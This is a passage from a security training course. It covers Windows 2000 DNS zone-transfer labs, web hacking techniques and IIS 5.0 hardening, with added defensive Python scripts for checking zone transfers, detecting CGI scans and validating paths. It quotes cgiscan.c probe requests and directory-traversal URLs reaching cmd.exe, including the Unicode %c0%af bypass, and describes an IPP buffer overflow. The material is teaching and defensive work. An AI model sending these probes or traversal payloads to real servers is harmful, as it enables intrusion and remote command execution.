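The two DNS risks covered in this section, an unauthorized zone transfer request and a forged response, can both be checked at the wire-format level. The following Python script is an added example and is not part of the course or of the Windows 2000 DNS server: check_zone_transfer() sends an AXFR request over TCP and reports whether the master answered with records or refused, which is how you confirm that a master's Only To The Following Servers restriction actually holds; response_matches_query() shows the transaction ID and question check a resolver performs before accepting a reply, which is the check a spoofed response must defeat. The zone name scnpdns.edu comes from the classroom setup; the reply messages are constructed so that the script runs offline.

```python
"""DNS wire-format helpers for two checks described in this section.

Added example, not part of the original course and not Windows 2000 DNS code:
(1) build an AXFR request and classify the master's reply, to verify that a
zone is transferred only to the secondaries listed under Only To The
Following Servers; (2) match a reply against the query that was actually sent,
the basic check a resolver makes before trusting a response, which is what a
blindly forged reply (DNS spoofing) has to defeat.
Server and zone names below come from the classroom setup; the reply
messages are constructed for offline use.
"""
import socket
import struct

QTYPE_A, QTYPE_AXFR, QCLASS_IN = 1, 252, 1
RCODE_NAMES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 3: "NXDOMAIN",
               4: "NOTIMP", 5: "REFUSED", 9: "NOTAUTH"}


def encode_name(name):
    """Dotted name -> DNS labels (length byte + text), terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(msg, offset):
    """Read a (possibly compressed) name at offset; return (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                     # compression pointer
            if not jumped:
                end = offset + 2
            offset = ((length & 0x3F) << 8) | msg[offset + 1]
            jumped = True
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels).lower(), (offset if end is None else end)


def build_query(name, qtype, txid):
    """12-byte header (flags 0: not recursive, as zone transfers never are) + one question."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_header_and_question(msg):
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "qr": bool(flags & 0x8000), "rcode": flags & 0x000F,
            "ancount": ancount, "qname": qname, "qtype": qtype, "qclass": qclass}


def classify_transfer_response(msg):
    """ALLOWED when the master answered the AXFR with records; otherwise the RCODE name."""
    hdr = parse_header_and_question(msg)
    if hdr["rcode"] == 0 and hdr["ancount"] > 0:
        return "ALLOWED"
    return RCODE_NAMES.get(hdr["rcode"], "RCODE%d" % hdr["rcode"])


def check_zone_transfer(server, zone, port=53, timeout=5.0):
    """Request an AXFR of `zone` from `server` over TCP (two-byte length prefix)."""
    query = build_query(zone, QTYPE_AXFR, txid=0x1234)
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(struct.pack("!H", len(query)) + query)
        (length,) = struct.unpack("!H", sock.recv(2))
        msg = b""
        while len(msg) < length:
            chunk = sock.recv(length - len(msg))
            if not chunk:
                break
            msg += chunk
    return classify_transfer_response(msg)


def response_matches_query(query, response):
    """Accept a reply only if it is flagged as a response and echoes the query's ID and question."""
    q, r = parse_header_and_question(query), parse_header_and_question(response)
    return (r["qr"] and r["id"] == q["id"] and r["qname"] == q["qname"]
            and r["qtype"] == q["qtype"] and r["qclass"] == q["qclass"])


def make_response(query, txid, rcode=0, ancount=0):
    """Constructed reply echoing a query's question section (records omitted)."""
    header = struct.pack("!HHHHHH", txid, 0x8000 | (rcode & 0xF), 1, ancount, 0, 0)
    return header + query[12:]


# Constructed messages: the classroom master refusing, then allowing, an AXFR.
AXFR_QUERY = build_query("scnpdns.edu", QTYPE_AXFR, txid=0x1234)
REFUSED_REPLY = make_response(AXFR_QUERY, 0x1234, rcode=5)
ALLOWED_REPLY = make_response(AXFR_QUERY, 0x1234, ancount=1)
```

To verify the restriction configured in the tasks below, call check_zone_transfer('172.17.10.1', 'scnpdns.edu') once from a student machine on the allowed list and once from one that is not; the first should return ALLOWED and the second REFUSED. Matching the ID and question is only the minimal check a resolver makes: it stops blind guesses, but not an attacker who already sees the query on the wire (the second spoofing method above), which is why the text also calls for logging and monitoring.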

Configuring DNS for Windows 2000

In the following set of tasks, you will install and configure DNS servers. First, your instructor will configure a DNS server on the instructor machine. This will be the Standard Primary Server. Watch the steps carefully as the instructor performs them. Next, the instructor will create Reverse Lookup Zones for the Left, Center, and Right subnets, matching the subnets in your classroom layout. Your instructor will also create one Forward Lookup Zone called scnpdns.edu for the whole class. You will later configure your machines to be Secondary DNS Servers to this Primary Server.

DNS spoofing: Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain.

INSTRUCTOR TASK 7B-2
Installing a Standard Primary DNS Server on a Windows 2000 Server

Setup: Your instructor will perform this task on the instructor machine.

1. If necessary, log on to Windows 2000 Server as Administrator.

2. Configure the nameserver lookup for the network interface 172.17.10.1 to be 172.17.10.1.

To do this, right-click My Network Places, and choose Properties. Right-click the Ethernet interface for 172.17.10.1, and choose Properties. Double-click Internet Protocol (TCP/IP). Select Use The Following DNS Server Addresses, and enter 172.17.10.1. Then click OK twice.

3. From the Network And Dial-up Connections Control Panel menu, choose Advanced→Optional Networking Components.

4. In the Components window, highlight, but do not check, Networking Services and click the Details button.

5. Check DNS and click OK.

6. Click Next, point to the location of your Windows 2000 Server’s i386 installation files, click Open, and click OK. You now have the DNS server installed on your machine.

Reverse Lookup Zones

Now your instructor will create Reverse Lookup Zones for the Left, Center, and Right to match the subnets, just the way your class is laid out. Your instructor will also configure Zone Transfer properties for selective transfers.

There is no particular reason for creating Reverse Lookup Zone(s) first and then the Forward Lookup Zone(s). It’s just that, by creating a Reverse Lookup Zone first, you are indicating an awareness of the various subnets that make up your network. This will lead to a more streamlined approach if you create host records via dynamic DNS (DDNS)—their associated reverse lookup records will be automatically created and placed in their appropriate zones. Even when you are manually creating host records, if you check the option to simultaneously create a reverse lookup record, the reverse lookup record will automatically be placed in the appropriate zone.

INSTRUCTOR TASK 7B-3
Creating Reverse Lookup Zones

Setup: Your instructor will perform this task on the instructor machine.

1. From the Start menu, choose Programs→Administrative Tools→DNS.

2. Expand INS-W2K-C01, select and right-click Reverse Lookup Zones, and choose New Zone.

3. Click Next, verify that Standard Primary is selected, and click Next.

4. For Network ID, enter 172.16.10.

5. Click Next twice, then click Finish.

6. Create Reverse Lookup Zones for the 172.17.10 and 172.18.10 zones. Use the steps above as a guide.

7. Expand the Reverse Lookup Zones folder. Select and right-click the Reverse Lookup Zone 172.16.10.x Subnet, and choose Properties.

8. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and add the IP addresses for all student machines that are on the 172.16.10.x subnet.

9. Click OK.

10. Select and right-click the Reverse Lookup Zone 172.17.10.x Subnet, and choose Properties.

11. Select the Zone Transfers tab, uncheck Allow Zone Transfers. Click OK.

12. Select and right-click the Reverse Lookup Zone 172.18.10.x, and choose Properties.

13. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and add the IP addresses for all student machines that are on the 172.18.10.x subnet.

14. Click OK.

Forward Lookup Zones

Now, your instructor will create a Forward Lookup Zone for the whole class. Your instructor will also configure Zone Transfer properties for selected transfers.

INSTRUCTOR TASK 7B-4
Creating a Forward Lookup Zone

Setup: Your instructor will perform this task on the instructor machine.

1. Select and right-click Forward Lookup Zones, and choose New Zone.

2. Click Next, verify that Standard Primary is selected, and click Next.

3. For Zone Name, enter scnpdns.edu.

4. Click Next twice, and then click Finish.

5. Expand Forward Lookup Zones, then select and right-click scnpdns.edu, and choose Properties.

6. Select the Zone Transfers tab, leave Allow Zone Transfers checked, but select the radio button next to Only To The Following Servers, and enter the IP addresses for all student machines that are on the 172.16.10.x and 172.18.10.x subnets.

7. Click OK.

8. If necessary, select the Zone you just created.

9. Right-click anywhere in the right pane, and choose New Host.

10. For the Host Name, enter STU-W2K-L01.

11. Enter the IP address for the host name, such as 172.16.10.1, and create the associated PTR record.

12. Click Add Host, click OK, then click Done.

13. Create a host record for every student machine in the classroom. Use the steps above as a guide.

14. Right-click each of the three Reverse Lookup Zones, and choose Refresh.

15. Right-click each of the three Reverse Lookup Zones, and choose Update Server Data File.

16. Right-click the Forward Lookup Zone scnpdns.edu, and choose Refresh.

17. Right-click the Forward Lookup Zone scnpdns.edu, and choose Update Server Data File.

Installing DNS

Now that a Standard Primary Server has been set up, you and the other students will install a DNS server on each of your machines. These are the servers that will later be configured as Standard Secondary Servers.

TASK 7B-5
Installing DNS Servers

Setup: Perform this task on all student machines.

1. If necessary, log on to Windows 2000 Server as the renamed Administrator account.

2. Open a command prompt and enter the ipconfig /all command.

3. Verify that you do not have a configuration for DNS server lookup.

4. Keep the command prompt open.

5. From your desktop, right-click My Network Places, and choose Properties.

6. Double-click the Classroom Hub interface.

7. Click Properties, double-click TCP/IP, specify your IP address in the field for Use The Following DNS Server Addresses, and click OK twice.

8. Switch back to the command prompt and reenter the ipconfig /all command.

9. Verify that you now have a configuration for DNS server lookup.

10. From the Network And Dial-up Connections Control Panel menu, choose Advanced→Optional Networking Components.

11. In the Components window, highlight, but do not check, Networking Services, and click the Details button.

12. Check DNS, and click OK.

13. Click Next, point to the location of your Windows i386 installation files, click Open, and click OK. You now have a DNS server installed on your machine.

Zone Configuration

Now that your DNS server has been set up, you will practice installing a Standard Primary Server of your own. You will verify the configuration files associated with your DNS server. You will then remove this zone from your DNS server.

TASK 7B-6
Creating, Viewing, and Deleting Forward and Reverse Lookup Zones

1. From the Start menu, choose Programs→Administrative Tools→DNS.

2. Click the + sign next to your computer name to expand it. You should see two folders, one called Forward Lookup Zones and the other Reverse Lookup Zones. You can right-click either of these to add zones. First, we will add a Forward Lookup Zone.

3. Select and right-click Forward Lookup Zones, and choose New Zone.

4. Click Next, verify that Standard Primary is selected, and click Next.

5. For Domain Name, enter studentxxx.edu, where xxx are the last three characters of your computer name. If your computer name is stu-w2k-r03 then you should create the Forward Lookup Zone studentr03.edu.

6. Click Next twice, and then click Finish.

7. Expand Forward Lookup Zones, and click the zone that you just created.

8. Observe the SOA (Start of Authority) and NS (nameserver) records with your server’s IP address.

9. Right-click anywhere in the right pane, and choose New Host.

10. In the New Host dialog box, enter testhost for the hostname.

11. Enter an IP address, such as 192.168.10.101.

12. Click Add Host, click OK, and then click Done.

13. Right-click anywhere in the right pane, and choose Update Server Data File.

14. Open Explorer, and navigate to your \WINNT\System32\dns folder.

15. Right-click studentxxx.edu.dns, and choose Open With.

16. Select Notepad, uncheck Always Use This Program To Open These Files,and click OK.

17. Observe that an A record for testhost has been created. You can also seethe text format of the SOA and NS records.

18. Switch back to the DNS console.

19. Right-click the zone you just created, and choose Delete. Click OK to confirm the deletion of the zone.

Standard Secondary DNS Servers

You will now configure your server to be a Standard Secondary Server. You will also verify that your Secondary Server will be able to receive the zone database information that it is entitled to.

TASK 7B-7
Creating Secondary Zones

Setup: To create a secondary zone, you first need a primary zone to be up and running. Your instructor’s machine is configured with the primary zone scnpdns.edu, so we can proceed.

1. Select and right-click Forward Lookup Zones, and choose New Zone.

2. Click Next, select Standard Secondary, and click Next.

3. For Zone Name, type scnpdns.edu. In an AD environment, you can browse for zones.

4. Click Next.

5. For the IP address of the instructor machine running the DNS server, enter 172.17.10.1.

6. Click Add, click Next, and then click Finish.

7. Click the zone that you just created.

8. If you see a red X and a message that states Zone Not Loaded By DNS Server, right-click the zone, and choose Transfer From Master. Then, refresh the DNS console until the zone information is displayed. The zone database should transfer to your DNS server from the instructor’s machine.

9. Right-click in the right pane.

10. Observe that, because this zone is a secondary zone, no records can be added or modified. You can only do two things: refresh the list or transfer the list from the primary server.

11. Select and right-click Reverse Lookup Zones, and choose New Zone.

12. Click Next, select Standard Secondary, and click Next.

13. If your IP address is 172.16.10.x, enter 172.16.10 for the Network ID.

If your IP address is 172.18.10.x, enter 172.18.10 for the Network ID.

14. Click Next.

15. For the IP address of the instructor machine, enter 172.17.10.1.

16. Click Add, click Next, and click Finish.

17. Expand Reverse Lookup Zones, and click the zone that you just created.

18. If the zone was not loaded by the DNS server, right-click the zone, and choose Transfer From Master. The zone database should transfer to your DNS server from the instructor’s machine.

19. Right-click in the right pane.

20. Observe that, again, because this zone is a secondary zone, no records can be added or modified. You can only do two things: refresh the list or transfer the list from the primary server.

Zone Transfers

You will now verify that your Secondary Server will not be able to receive zone database information that it is not entitled to.

TASK 7B-8
Attempting Blocked Zone Transfers

1. Select and right-click Reverse Lookup Zones, and choose New Zone.

2. Click Next, select Standard Secondary, and click Next.

3. If your IP address is 172.16.10.x, enter 172.18.10 for the Network ID.

If your IP address is 172.18.10.x, enter 172.16.10 for the Network ID.

4. Click Next.

5. For the IP address of the instructor machine, enter 172.17.10.1.

6. Click Add, click Next, and click Finish.

7. In the left pane, click the zone that you just created.

8. Verify that you see a red X and the message Zone Not Loaded by DNS Server. Right-click the zone, and choose Transfer From Master. This time, the zone database should not transfer to your DNS server from the instructor’s machine.

This is because the Primary Server has been configured to allow only certain secondary servers to transfer zone database information, and your server is not on that list.

9. Right-click Reverse Lookup Zone, and choose New Zone.

10. Click Next, select Standard Secondary, and click Next.

11. For the Network ID, enter 172.17.10.

12. Click Next.

13. For the IP address of the instructor machine, enter 172.17.10.1.

14. Click Add, click Next, and click Finish.

15. In the left pane, click the zone that you just created.

16. Verify that you see a red X and the message Zone Not Loaded by DNS Server. Right-click the zone, and choose Transfer From Master. This time, the zone database should not transfer to your DNS server from the instructor’s machine.

This is because the Primary Server has been configured so that no servers are allowed to transfer zone database information.

17. Close all open windows.

Topic 7C
Describing Web Hacking Techniques

Instead of taking the time to manually look for holes, hackers will use tools designed to search for specific exploit opportunities. These tools will scan a site, looking for the exact type of vulnerability that the hacker seeks.

Vulnerability Scanning

Although it may not be the most glamorous of techniques, searching for existing vulnerabilities is a simple way to recognize holes that will not take much effort to capitalize on. Even after Web holes and well-known vulnerabilities are exposed for years, many Web administrators do not patch or fix the holes.

One of the most popular of these is simply cgiscan.c. This program connects to a Web server (UNIX or NT) and scans to see if the given cgi vulnerabilities are present. If they are, the hacker is notified of the condition and can then proceed to exploit the hole.

The following is an excerpt from the code of cgiscan.c to show several of the vulnerabilities this scan searches for:

temp[1] = "GET /cgi-bin/phf HTTP/1.0\n\n";
temp[2] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
temp[3] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
temp[4] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
temp[5] = "GET /cgi-bin/handler HTTP/1.0\n\n";
temp[6] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
temp[7] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";

Hackers can use this simple and efficient scanner to test sites very quickly. This effective program is one way hackers can identify holes in the security of potential targets.
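From the defending side, the probe list above is also a detection signature. The following Python script is an added example (it is not part of the course or of cgiscan.c) that parses Common Log Format access-log lines, flags requests for the paths the cgiscan.c excerpt probes, and names any client that hits several of them in the log; the log lines are constructed for this example.

```python
"""Flag web-server access-log requests for the CGI programs cgiscan.c probes.

Added example, not part of the course material: the path list is taken from
the cgiscan.c excerpt in the text; the log lines are constructed in Common
Log Format.
"""
import re

# Paths requested by the cgiscan.c excerpt in the text.
CGISCAN_PATHS = {
    "/cgi-bin/phf", "/cgi-bin/Count.cgi", "/cgi-bin/test-cgi", "/cgi-bin/php.cgi",
    "/cgi-bin/handler", "/cgi-bin/webgais", "/cgi-bin/websendmail",
}

# Common Log Format: host ident user [time] "method path protocol" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one normal request, a burst of probes from one
# client (one of which found a CGI actually present), and one unrelated hit.
SAMPLE_LOG = """\
172.16.10.3 - - [10/Oct/2001:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326
10.1.1.9 - - [10/Oct/2001:13:55:40 -0700] "GET /cgi-bin/phf HTTP/1.0" 404 210
10.1.1.9 - - [10/Oct/2001:13:55:40 -0700] "GET /cgi-bin/Count.cgi HTTP/1.0" 404 210
10.1.1.9 - - [10/Oct/2001:13:55:41 -0700] "GET /cgi-bin/test-cgi HTTP/1.0" 200 512
10.1.1.9 - - [10/Oct/2001:13:55:41 -0700] "GET /cgi-bin/handler HTTP/1.0" 404 210
172.16.10.5 - - [10/Oct/2001:13:56:02 -0700] "GET /cgi-bin/Count.cgi?df=counter.dat HTTP/1.0" 200 99
"""


def parse_clf(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string before matching
    rec["status"] = int(rec["status"])
    return rec


def find_cgi_probes(log_text, min_paths_per_host=3):
    """Return (hits, scanners).

    hits: (host, path, status) for every request to a probed path.
    scanners: hosts that requested at least min_paths_per_host distinct probed
    paths, which is the pattern a scanner leaves and a single user does not.
    """
    hits, paths_per_host = [], {}
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None or rec["path"] not in CGISCAN_PATHS:
            continue
        hits.append((rec["host"], rec["path"], rec["status"]))
        paths_per_host.setdefault(rec["host"], set()).add(rec["path"])
    scanners = sorted(h for h, paths in paths_per_host.items() if len(paths) >= min_paths_per_host)
    return hits, scanners


if __name__ == "__main__":
    found, scanning_hosts = find_cgi_probes(SAMPLE_LOG)
    for hit in found:
        print("probe: %s %s -> %d" % hit)
    print("scanning hosts:", scanning_hosts)
```

When reviewing the hits, a 200 status on one of these paths matters more than the 404s: it means the program is actually present on the server and should be removed or patched, which is the fix the text says many administrators neglect.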

Common Web Hacking Techniques

CGI: (Common Gateway Interface) CGI is the method that Web servers use to allow interaction between servers and clients.

Incorrect Web Design

Common mistakes that Web designers make are to include extra information or to include what are known as hidden tags. These tags define values for a Web page that are not visible through the normal Web browser. Only when the source of a Web page is viewed can these tags be revealed. This extra information could be phone numbers, addresses, site designer logos, even the directory structure of the hard drive where the site resides.

Hackers will simply connect normally to a Web site and view the source code of the various pages, searching for keywords and clues to further assist in attacking the site or network. This process can become tedious, however. If there is a site with hundreds of pages, searching their source code, page by page, can take days.

Teleport Pro is a tool that assists in this procedure. With options such as the ability to download an entire Web site to a local hard drive for further examination, Teleport Pro has great features. Teleport Pro can also mirror entire Web sites, including their directory structures. See Figure 7-8 for an example of what Teleport Pro can do.

Figure 7-8: An example of the options available with Teleport Pro.

Although not as common as in previous years, mainly due to better programming, there are sites and pages where there are hidden tags in the actual Web pages that define the prices of items entered into open text boxes. If this were to be found as true, the hacker could simply modify the code to represent a value of, say, $5.95 instead of $59.95. During the checkout process on that site, the hacker is simply proceeding as any other user, only with a significant discount on goods purchased!

Figure 7-9: An example of hidden tags in the source code of a Web page. Notice the price tags visible to be edited.

Buffer Overflows

Buffer overflows are a staple of hacking techniques that are not lost on Web hacking. Buffer overflows are very effective, and there are two outstanding papers on the subject: “How to Write Buffer Overflows,” by Mudge (1995), and “Smashing the stack for fun and profit,” by Aleph One (1996). These two papers outline the methods and techniques for creating buffer overflows.

The concept of a buffer overflow is to exploit a program that does not check for the size of input being stored in a buffer (memory space). By writing input data that is beyond the normal bounds of the program, an attacker can make modifications to program data stored in an adjacent memory space.

Attackers will target programs that have been programmed in C, as native C programming does not include a bounds-checking feature. (Bounds checking verifies that input fields are restricted to a given size and do not remain open-ended.) Two examples of C functions without the checking option are gets and strcpy.

The attack generally has the goal of running an unauthorized process as root. If the attack executes properly, the attacker will have a root shell at his or her disposal. This is why buffer overflows can be so dangerous. An attacker issues a buffer overflow remotely and ends up with a root shell of a local machine.

Although it may seem that buffer overflows are the key to taking down systems, and you may be wondering why every system on the Internet is not already compromised, the answer is that the actual writing of buffer overflows is not the easiest of processes to accomplish.

buffer overflow: This happens when more data is put into a buffer or holding area than the buffer can handle. This is due to a mismatch in processing rates between the producing and consuming processes. This can result in system crashes or the creation of a backdoor leading to system access.

Hacking Via a Buffer Overflow

In order for an attacker to start from scratch and attempt a buffer overflow of a target system, the following steps would have to be completed:

1. Locate the potential target on the Internet. (Not difficult.)

2. Identify the running operating system. (Not difficult.)

3. Identify the running services and programs on the target system. (Starting to get more difficult, since open ports do not indicate all running services and programs.)

4. Reverse-engineer the services and programs on the target, looking for the potential buffer overflow holes. (This is where the level of difficulty jumps much higher.)

5. Write the attack code to fall in the correct buffer space on the target. (Still remaining quite difficult.)

6. Inject attack code on the target system. (Variable difficulty, depending on open ports, services, and programs running.)

7. Have the code execute and access the root shell. (Not difficult, assuming that the exploit is written properly.)

Keeping this in mind, the process of buffer overflows may not seem so overpowering as it did a few minutes ago. However, before the assumption is made that buffer overflows are not a problem, you must realize that making a buffer overflow from scratch is not required.

When buffer overflows are discovered, there are exploits written, perhaps by only one person, that become available on the Internet. This potential makes buffer overflows as dangerous as ever, and arguably even more so. Hackers now can use buffer-overflow attacks with no concept of how they work or what their functions are. The danger is definitely real.

TASK 7C-1
Identifying Web Hacking Techniques

1. Discuss, with at least one other student, the principles of the DDoS, buffer overflows, Web design flaws, and vulnerability scanning.

2. Define potential countermoves that could be used against these techniques. Be prepared to discuss your findings with the rest of the class.

Responses will vary.

Web Server Security

Securing a Web server is perhaps the most nerve-racking position that security professionals can find. With changes happening daily, if not hourly, these security professionals may find themselves overwhelmed by the amount of information they are to absorb constantly.

IIS Security

When Microsoft released Windows 2000, it came packaged with powerful Web server software in the form of Internet Information Server (IIS) 5.0. This software allows anyone to quickly and easily set up myriad services, including Web services. Although the number of sites hosted by IIS grows consistently, it is still far behind in terms of Web hosting on the Internet.

One of the reasons that IIS is not the leading Web-hosting platform is that there have been many serious security issues with hosting a Web site on IIS. Over the years, IIS has been found to have many vulnerabilities; often, these vulnerabilities fall under the category of buffer overflows.

One of the methods that attackers will use to gain access to a Web site is often called the double-dot vulnerability. This is an attack that is designed to input a character stream that will allow the attacker to gain access to directories outside of the Web data.

A common attack that is trying to use this vulnerability would look like this: http://10.10.10.1/scripts/../../winnt/system32/cmd.exe. This type of attack, which may be successful on older, unpatched Web servers, will not work on a Microsoft IIS 5.0 Web server. The reason it will not work is that built into the IIS software is a security-checking feature that looks for the /../ pattern. If this pattern is seen, the server will not grant the request, and the attack fails.

There is, however, a variation of this attack that the security-checking features of IIS will not catch. This is the Unicode vulnerability. This attack looks like this: http://10.10.10.1/scripts/..%c0%af../winnt/system32/cmd.exe. Although it looks similar to the previous attack, this one would be successful on a default IIS 5.0 server, because the IIS security-check software runs before the Unicode characters are decoded. Once successful, this attack will provide the attacker a command prompt for the server on the remote client.
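The ordering problem the text describes can be shown directly. The following Python script is an added example and is not IIS code: check_before_decoding() applies the /../ test to the raw request and therefore lets the Unicode form through, while check_after_decoding() decodes first, rejects the overlong %c0%af sequence as malformed UTF-8, and only then checks that the normalised path stays inside the web root. The two request paths are the ones quoted above; the web root directory is an assumption.

```python
"""Path checks in the two orders the text contrasts: before and after decoding.

Added example, not IIS code and not from the course: it models the check
ordering the text describes, not IIS internals. The two request paths are the
ones quoted in the text; the web root is an assumed directory.
"""
import posixpath
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/inetpub/wwwroot"          # assumed on-disk root the server maps URLs into

TRAVERSAL_DOTDOT = "/scripts/../../winnt/system32/cmd.exe"
TRAVERSAL_UNICODE = "/scripts/..%c0%af../winnt/system32/cmd.exe"


def check_before_decoding(raw_path):
    """The flawed order: inspect the raw request for '/../' and decode afterwards.

    Returns True when the request would be allowed through."""
    return "/../" not in raw_path and not raw_path.startswith("../")


def lenient_decode_overlong_slash(raw_path):
    """What a decoder that accepts the overlong form sees: %c0%af becomes '/'.

    Shown only to make the text's point concrete; a correct decoder rejects it."""
    return raw_path.replace("%c0%af", "/").replace("%C0%AF", "/")


def decode_request_path(raw_path):
    """Percent-decode, then decode as strict UTF-8.

    Strict UTF-8 rejects overlong sequences such as C0 AF (a two-byte
    encoding of '/'), so the Unicode variant fails here instead of reaching
    the file system."""
    return unquote_to_bytes(raw_path).decode("utf-8")


def check_after_decoding(raw_path, web_root=WEB_ROOT):
    """The sound order: decode, map onto the root, normalise, then check containment."""
    try:
        decoded = decode_request_path(raw_path)
    except UnicodeDecodeError:
        return False                      # malformed encoding is rejected outright
    target = posixpath.normpath(posixpath.join(web_root, decoded.lstrip("/")))
    return target == web_root or target.startswith(web_root + "/")


if __name__ == "__main__":
    for path in (TRAVERSAL_DOTDOT, TRAVERSAL_UNICODE, "/scripts/query.asp"):
        print("%-45s raw-check allows: %-5s decode-then-check allows: %s"
              % (path, check_before_decoding(path), check_after_decoding(path)))
```

The lesson generalises beyond this one encoding: any check applied to a request before it has been fully decoded and canonicalised can be bypassed by an encoding the check does not understand, so containment must be decided on the final path the file system will see.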

Another attack that IIS 5.0 servers are vulnerable to is the attack via the Internet Printing Protocol (IPP). IPP provides users the ability to print documents across the Internet, submitted via a Web browser. Internet Printing is on by default in all IIS 5.0 installations, and all unpatched systems are vulnerable to this exploit.

The specific vulnerability is a buffer overflow in msw3prt.dll. In order for an attacker to take advantage of this, he or she would submit a string of approximately 420 characters that will, in turn, cause the overflow. The overflow in this case can be a remote command prompt. For further reading on this vulnerability, please visit the eEye Web site at www.eeye.com, and look under the Advisories link.

To secure a machine running IIS 5.0, it is suggested that you follow these recommendations:

1. Apply the hisecweb.inf high security template. (Templates were covered earlier in the course.)

2. Monitor security updates from Microsoft, using the Microsoft Hotfix utility. Have this tool configured to retrieve updates every day.

3. Follow the steps of the Microsoft “Secure Internet Information Services 5.0 Checklist” from TechNet.

4. Harden the IIS machine according to the Microsoft TechNet article “From Blueprint to Fortress: A Guide to Securing IIS 5.0.”

Securing IIS 5.0

TASK 7C-2
Investigating IIS Security

Setup: A default install of Windows 2000 Server will have IIS 5.0 running. You will use the Security Configuration And Analysis Snap-in to analyze your machine against the hisecweb.inf template.

1. Copy the file hisecweb.inf from the location specified by your instructor to your \WINNT\security\templates folder.

2. Start the MMC, and add the Security Configuration And Analysis standalone snap-in.

3. In the left pane, right-click Security Configuration And Analysis, and choose Open Database.

4. Enter newweb, and click Open.

5. From the Import Template dialog box, select hisecweb.inf, and click Open.

6. In the left pane, right-click Security Configuration And Analysis, and choose Analyze Computer Now.

7. Click OK. You should see a list of policies, services, Registry settings, and file-system information that should be set a certain way if this is to be a secure Web server.

8. Close the window without saving the console.

Web Site Configuration

The following task demonstrates how to host a site on your Web server.

TASK 7C-3
Implementing a Web Site

1. From the Start menu, choose Programs→Administrative Tools→Internet Services Manager.

2. In the left pane, click and expand the options under your computer. You should see items like Default Web Site and Default SMTP Virtual Server. These are the various Internet servers running on your machine.

3. Right-click Default Web Site, and choose Properties. You should see a dialog box with a number of tabs relating to this site. Clicking on any tab opens the Property page associated with that tab.

4. If necessary, select the Web Site tab.

Provide students with the location of the hisecweb.inf template file. If you have downloaded the self-extracting executable, have students extract the .inf file before proceeding to the next step.

5. In the IP Address box, observe that All Unassigned is displayed. This means that this Web site will respond to requests on any of the IP addresses associated with this computer that no other site has claimed. We need only one address to be active.

6. For this default Web site, select the IP address connected to your classroom hub from the drop-down list. This is the one listed as 172.16.x.y if you are on the left side of the classroom or 172.18.x.y if you are on the right side.

7. Click OK.

8. In Windows Explorer, navigate to the \Inetpub folder. This is the Windows default location for the various Internet-related servers.

9. In the Inetpub folder, create a folder called newweb.

10. Copy the file simple.htm from your course CD to this folder. It should be located in the \085545\Data\HTML Files folder.

11. Switch back to Internet Services Manager.

12. Right-click your computer name, and choose New→Web Site.

13. In the Web Site Creation Wizard, click Next.

14. For Description, enter newweb, and then click Next.

15. For IP Address To Use For This Web Site, select 172.26.x.y if you are on the left side of the class or 172.28.x.y if you are on the right side.

16. Click Next.

17. For Path To This Web Site’s Home Directory, click Browse, and then navigate and point to the newweb folder that you created earlier.

18. Click Next twice, and then click Finish.

19. Right-click the new Web site, and choose Properties.

20. Click the Documents tab.

21. Click Add.

22. For the name of the default document, specify simple.htm, making sure that you match the spelling and capitalization.

23. Click OK.

24. Observe the screen. To the left of the box, there are a couple of bent arrows pointing up and down.

25. Click the Up Arrow button as many times as is necessary to push the simple.htm document to the very top of the list.

26. Click OK. Your new Web site should be set up.


27. Right-click the new Web site, and (if necessary) choose Start.

28. Ask your partner to open a browser and connect to your Web site, using http://172.26.x.y or http://172.28.x.y depending on your location in the classroom.

29. Do the same for your partner. You should be able to view the SCP Challenge Web site hosted on your partner’s machine.

Web Site Maintenance

When you are conducting maintenance on a Web, FTP, or email site, you should first stop the server. When you are done with your work, you should start the server again, so that all of the changes you have made will take effect properly.

TASK 7C-4: Starting and Stopping the Web Server

1. Switch to Internet Services Manager.

2. Right-click your Web site, and choose Stop.

3. Verify that your partner has done the same.

4. Switch to Internet Explorer, and refresh the page by choosing View→Refresh or by pressing F5. You should no longer be able to view the Web page.

5. Switch to Internet Services Manager.

6. Right-click your Web site, and choose Start.

7. Verify that your partner has done the same.

8. Switch to Internet Explorer, and refresh the page. You should again be able to view the Web page.

9. Switch to Internet Services Manager, and stop your Web server. You will be doing more configuration of the Web site in the next few tasks.

DoS Problems

One of the items that you should think about from a security standpoint is that a malicious user may try to bring down your Web server by keeping it so busy that the CPU is saturated and the machine eventually hangs. IIS lets you cap how much CPU time and how much bandwidth a site may consume. Be clear about what these limits do and do not buy you: process throttling applies only to a site's out-of-process applications (CGI and isolated ASP applications), and neither setting stops a flood of requests from reaching the server. What they do is keep one site from starving the other sites hosted on the same machine.


TASK 7C-5: Controlling Performance Settings

1. Right-click your Web site, and choose Properties.
